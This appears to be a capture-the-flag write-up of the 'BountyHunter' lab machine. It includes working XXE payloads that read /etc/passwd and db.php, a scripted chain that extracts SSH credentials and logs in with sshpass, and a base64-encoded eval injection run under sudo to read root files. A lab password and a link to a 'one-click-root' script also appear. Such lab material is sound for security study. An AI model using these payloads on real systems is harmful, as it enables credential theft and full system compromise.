bountyhunter
Introduction:
Recon
1sudo nmap -sC -sV -T4 -Pn -O -oN nmap.bountyhunter.txt 10.129.146.231
2Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
3Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-26 21:25 EDT
4Nmap scan report for 10.129.146.231
5Host is up (0.014s latency).
6Not shown: 998 closed ports
7PORT STATE SERVICE VERSION
822/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
9| ssh-hostkey:
10| 3072 d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 (RSA)
11| 256 a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 (ECDSA)
12|_ 256 a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 (ED25519)
1380/tcp open http Apache httpd 2.4.41 ((Ubuntu))
14|_http-server-header: Apache/2.4.41 (Ubuntu)
15|_http-title: Bounty Hunters
16No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
17TCP/IP fingerprint:
18OS:SCAN(V=7.91%E=4%D=7/26%OT=22%CT=1%CU=40458%PV=Y%DS=2%DC=I%G=Y%TM=60FF608
19OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=A)OPS
20OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
21OS:1NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
22OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
23OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
24OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
25OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
26OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
27OS:=S)
28
29Network Distance: 2 hops
30Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
31
32OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
33Nmap done: 1 IP address (1 host up) scanned in 19.69 seconds
34
35```
36
37# Enumeration
38
39http://bountyhunter.htb/resources/bountylog.js
40
41```
42function returnSecret(data) {
43 return Promise.resolve($.ajax({
44 type: "POST",
45 data: {"data":data},
46 url: "tracker_diRbPr00f314.php"
47 }));
48}
49
50async function bountySubmit() {
51 try {
52 var xml = `<?xml version="1.0" encoding="ISO-8859-1"?>
53 <bugreport>
54 <title>${$('#exploitTitle').val()}</title>
55 <cwe>${$('#cwe').val()}</cwe>
56 <cvss>${$('#cvss').val()}</cvss>
57 <reward>${$('#reward').val()}</reward>
58 </bugreport>`
59 let data = await returnSecret(btoa(xml));
60 $("#return").html(data)
61 }
62 catch(error) {
63 console.log('Error:', error);
64 }
65}
66
67```
68
69
70
71```
72POST /tracker_diRbPr00f314.php HTTP/1.1
73Host: 10.129.146.231
74User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
75Accept: */*
76Accept-Language: en-US,en;q=0.5
77Accept-Encoding: gzip, deflate
78Content-Type: application/x-www-form-urlencoded; charset=UTF-8
79X-Requested-With: XMLHttpRequest
80Content-Length: 245
81Origin: http://10.129.146.231
82Connection: close
83Referer: http://10.129.146.231/log_submit.php
84
85data=PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KCQk8YnVncmVwb3J0PgoJCTx0aXRsZT5URVNUVElUTEU8L3RpdGxlPgoJCTxjd2U%2BVEVTVENXRTwvY3dlPgoJCTxjdnNzPlRFU1RTQ09SRTwvY3Zzcz4KCQk8cmV3YXJkPlRFU1RSRVdBUkQ8L3Jld2FyZD4KCQk8L2J1Z3JlcG9ydD4%3D
86```
87
88URL Decoded
89```
90PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KCQk8YnVncmVwb3J0PgoJCTx0aXRsZT5URVNUVElUTEU8L3RpdGxlPgoJCTxjd2U+VEVTVENXRTwvY3dlPgoJCTxjdnNzPlRFU1RTQ09SRTwvY3Zzcz4KCQk8cmV3YXJkPlRFU1RSRVdBUkQ8L3Jld2FyZD4KCQk8L2J1Z3JlcG9ydD4=
91```
92
93BASE64 Decoded
94
95```
96<?xml version="1.0" encoding="ISO-8859-1"?>
97 <bugreport>
98 <title>TESTTITLE</title>
99 <cwe>TESTCWE</cwe>
100 <cvss>TESTSCORE</cvss>
101 <reward>TESTREWARD</reward>
102 </bugreport>
103```
104
105
106# Exploitation
107
108```
109<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
110 <bugreport>
111 <title>&xxe;</title>
112 <cwe>TESTCWE</cwe>
113 <cvss>TESTSCORE</cvss>
114 <reward>TESTREWARD</reward>
115 </bugreport>
116```
117BASE64 Encoded
118
119PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz48IURPQ1RZUEUgZm9vWzwhRU5USVRZIHh4ZSBTWVNURU0gImZpbGU6Ly8vZXRjL3Bhc3N3ZCI+XT4KCQk8YnVncmVwb3J0PgoJCTx0aXRsZT4meHhlOzwvdGl0bGU+CgkJPGN3ZT5URVNUQ1dFPC9jd2U+CgkJPGN2c3M+VEVTVFNDT1JFPC9jdnNzPgoJCTxyZXdhcmQ+VEVTVFJFV0FSRDwvcmV3YXJkPgoJCTwvYnVncmVwb3J0Pg==
120
121URL Encoded
122```
123%50%44%39%34%62%57%77%67%49%48%5a%6c%63%6e%4e%70%62%32%34%39%49%6a%45%75%4d%43%49%67%5a%57%35%6a%62%32%52%70%62%6d%63%39%49%6b%6c%54%54%79%30%34%4f%44%55%35%4c%54%45%69%50%7a%34%38%49%55%52%50%51%31%52%5a%55%45%55%67%5a%6d%39%76%57%7a%77%68%52%55%35%55%53%56%52%5a%49%48%68%34%5a%53%42%54%57%56%4e%55%52%55%30%67%49%6d%5a%70%62%47%55%36%4c%79%38%76%5a%58%52%6a%4c%33%42%68%63%33%4e%33%5a%43%49%2b%58%54%34%4b%43%51%6b%38%59%6e%56%6e%63%6d%56%77%62%33%4a%30%50%67%6f%4a%43%54%78%30%61%58%52%73%5a%54%34%6d%65%48%68%6c%4f%7a%77%76%64%47%6c%30%62%47%55%2b%43%67%6b%4a%50%47%4e%33%5a%54%35%55%52%56%4e%55%51%31%64%46%50%43%39%6a%64%32%55%2b%43%67%6b%4a%50%47%4e%32%63%33%4d%2b%56%45%56%54%56%46%4e%44%54%31%4a%46%50%43%39%6a%64%6e%4e%7a%50%67%6f%4a%43%54%78%79%5a%58%64%68%63%6d%51%2b%56%45%56%54%56%46%4a%46%56%30%46%53%52%44%77%76%63%6d%56%33%59%58%4a%6b%50%67%6f%4a%43%54%77%76%59%6e%56%6e%63%6d%56%77%62%33%4a%30%50%67%3d%3d
124```
125
126BURP Repeater request
127
128```
129POST /tracker_diRbPr00f314.php HTTP/1.1
130Host: 10.129.147.202
131User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
132Accept: */*
133Accept-Language: en-US,en;q=0.5
134Accept-Encoding: gzip, deflate
135Content-Type: application/x-www-form-urlencoded; charset=UTF-8
136X-Requested-With: XMLHttpRequest
137Content-Length: 929
138Origin: http://10.129.147.202
139Connection: close
140Referer: http://10.129.147.202/log_submit.php
141
142data=%50%44%39%34%62%57%77%67%49%48%5a%6c%63%6e%4e%70%62%32%34%39%49%6a%45%75%4d%43%49%67%5a%57%35%6a%62%32%52%70%62%6d%63%39%49%6b%6c%54%54%79%30%34%4f%44%55%35%4c%54%45%69%50%7a%34%38%49%55%52%50%51%31%52%5a%55%45%55%67%5a%6d%39%76%57%7a%77%68%52%55%35%55%53%56%52%5a%49%48%68%34%5a%53%42%54%57%56%4e%55%52%55%30%67%49%6d%5a%70%62%47%55%36%4c%79%38%76%5a%58%52%6a%4c%33%42%68%63%33%4e%33%5a%43%49%2b%58%54%34%4b%43%51%6b%38%59%6e%56%6e%63%6d%56%77%62%33%4a%30%50%67%6f%4a%43%54%78%30%61%58%52%73%5a%54%34%6d%65%48%68%6c%4f%7a%77%76%64%47%6c%30%62%47%55%2b%43%67%6b%4a%50%47%4e%33%5a%54%35%55%52%56%4e%55%51%31%64%46%50%43%39%6a%64%32%55%2b%43%67%6b%4a%50%47%4e%32%63%33%4d%2b%56%45%56%54%56%46%4e%44%54%31%4a%46%50%43%39%6a%64%6e%4e%7a%50%67%6f%4a%43%54%78%79%5a%58%64%68%63%6d%51%2b%56%45%56%54%56%46%4a%46%56%30%46%53%52%44%77%76%63%6d%56%33%59%58%4a%6b%50%67%6f%4a%43%54%77%76%59%6e%56%6e%63%6d%56%77%62%33%4a%30%50%67%3d%3d
143```
144
145```
146root:x:0:0:root:/root:/bin/bash
147daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
148bin:x:2:2:bin:/bin:/usr/sbin/nologin
149sys:x:3:3:sys:/dev:/usr/sbin/nologin
150sync:x:4:65534:sync:/bin:/bin/sync
151games:x:5:60:games:/usr/games:/usr/sbin/nologin
152man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
153lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
154mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
155news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
156uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
157proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
158www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
159backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
160list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
161irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
162gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
163nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
164systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
165systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
166systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
167messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
168syslog:x:104:110::/home/syslog:/usr/sbin/nologin
169_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
170tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
171uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
172tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
173landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
174pollinate:x:110:1::/var/cache/pollinate:/bin/false
175sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
176systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
177development:x:1000:1000:Development:/home/development:/bin/bash
178lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
179usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
180```
181
182
183
184
185cat xxe.xml |base64 -w 0 |xxd -p|tr -d \\n|sed 's/../%&/g'
186
187https://gist.githubusercontent.com/Rajchowdhury420/b0e58d1e7ee22e017f65e1a18560ae56/raw/2d63b911df1cb3057ab90fd5e25bfde3e7347954/one-click-root.sh
188
189
190
191data='<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE title [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">]><bugreport><title></title><cwe></cwe><cvss></cvss><reward>&xxe;</reward></bugreport>'
192user=$(bash -c "curl -X POST --data-urlencode \"data=$(echo $data | base64 -w 0)\" 'http://bountyhacker.htb/tracker_diRbPr00f314.php' | html2markdown | tail -n 2 | head -n 1 | base64 -d" 2>/dev/null | grep '/bin/bash$' | awk -F':' '{print $5}' | cut -d , -f1 | tail -n 1 | tr '[:upper:]' '[:lower:]')
193data='<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE title [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/db.php">]><bugreport><title></title><cwe></cwe><cvss></cvss><reward>&xxe;</reward></bugreport>'
194password1=$(bash -c "curl -X POST --data-urlencode \"data=$(echo $data | base64 -w 0)\" 'http://bountyhacker.htb/tracker_diRbPr00f314.php' | html2markdown | tail -n 2 | head -n 1 | base64 -d" 2>/dev/null | grep -i '$dbpassword' | cut -d '"' -f 2)
195
196echo "Got SSH Creds ! Username= $user , Password= $password1"
197
198sshpass -p "$password1" ssh -oStrictHostKeyChecking=accept-new "$user"@bountyhacker.htb 'bash -c "echo IyBTa3l0cmFpbiBJbmMKIyMgVGlja2V0IHRvICAgICBhYmMKX19UaWNrZXQgQ29kZTpfXwpfX1RpY2tldCBDb2RlOl9fCioqNCsyMDArZXhlYygnJydpbXBvcnQgb3M7b3Muc3lzdGVtKCJlY2hvIC1uICdmbGFnIHVzZXIudHh0PSAnOyBjYXQgL2hvbWUvZGV2ZWxvcG1lbnQvdXNlci50eHQ7IGVjaG8gLW4gJ2ZsYWcgcm9vdC50eHQ9ICc7Y2F0IC9yb290L3Jvb3QudHh0IiknJycpCg==" | base64 -d > root.md; echo "root.md" | sudo $(sudo -l | rev | awk '"'"'{print $1" "$2}'"'"' | rev | tail -n 1)' 2>/dev/null | grep flag | awk '{print $2 " " $3}'
199
200
201m19RoAU0hP41A1sTsq6K
202
203
204
205# Post-exploit/PrivEsc
206
207
208
209development@bountyhunter:/var/www/html$ find / -name *.md 2>/dev/null
210/opt/skytrain_inc/invalid_tickets/390681613.md
211/opt/skytrain_inc/invalid_tickets/734485704.md
212/opt/skytrain_inc/invalid_tickets/529582686.md
213/opt/skytrain_inc/invalid_tickets/600939065.md
214/var/lib/fwupd/builder/README.md
215/usr/share/fwupd/remotes.d/vendor/firmware/README.md
216/usr/share/alsa/ucm2/README.md
217/usr/share/alsa/ucm/README.md
218/usr/share/doc/systemd/DISTRO_PORTING.md
219/usr/share/doc/systemd/TRANSLATORS.md
220/usr/share/doc/sos/README.md
221/usr/share/doc/command-not-found/README.md
222/usr/share/doc/libtasn1-6/README.md
223/usr/share/doc/libcbor0.6/README.md
224/usr/share/doc/libfuse2/README.md
225/usr/share/doc/python3-requests/README.md
226/usr/share/doc/sosreport/README.md
227/usr/share/doc/procps/bugs.md
228/usr/share/doc/psmisc/README.md
229/usr/share/doc/libpcap0.8/README.md
230/usr/share/doc/bolt/README.md
231/usr/share/doc/accountsservice/README.md
232/usr/share/doc/byobu/README.md
233/usr/share/doc/python3-httplib2/README.md
234
235
236
237development@bountyhunter:/var/www/html$ cat /opt/skytrain_inc/invalid_tickets/600939065.md
238# Skytrain Inc
239## Ticket to Essex
240__ticket code:__
241**11+321+1**
242##Issued: 2021/05/12
243#End Ticket
244
245
246
247
248```
249#Skytrain Inc Ticket Validation System 0.1
250#Do not distribute this file.
251
252def load_file(loc):
253 if loc.endswith(".md"):
254 return open(loc, 'r')
255 else:
256 print("Wrong file type.")
257 exit()
258
259def evaluate(ticketFile):
260 #Evaluates a ticket to check for ireggularities.
261 code_line = None
262 for i,x in enumerate(ticketFile.readlines()):
263 if i == 0:
264 if not x.startswith("# Skytrain Inc"):
265 return False
266 continue
267 if i == 1:
268 if not x.startswith("## Ticket to "):
269 return False
270 print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
271 continue
272
273 if x.startswith("__Ticket Code:__"):
274 code_line = i+1
275 continue
276
277 if code_line and i == code_line:
278 if not x.startswith("**"):
279 return False
280 ticketCode = x.replace("**", "").split("+")[0]
281 if int(ticketCode) % 7 == 4:
282 validationNumber = eval(x.replace("**", ""))
283 if validationNumber > 100:
284 return True
285 else:
286 return False
287 return False
288
289def main():
290 fileName = input("Please enter the path to the ticket file.\n")
291 ticket = load_file(fileName)
292 #DEBUG print(ticket)
293 result = evaluate(ticket)
294 if (result):
295 print("Valid ticket.")
296 else:
297 print("Invalid ticket.")
298 ticket.close
299
300main()
301
302```
303
304
305```
306# Skytrain Inc
307## Ticket to Essex
308__ticket code:__
309**11+321+1**
310##Issued: 2021/05/12
311#End Ticket
312
313```
314
315
316```
317# Skytrain Inc
318## Ticket to Essex
319__Ticket Code:__
320**11+321+1**
321##Issued: 2021/05/12
322#End Ticket
323```
324
325
326
327
328
329Notes: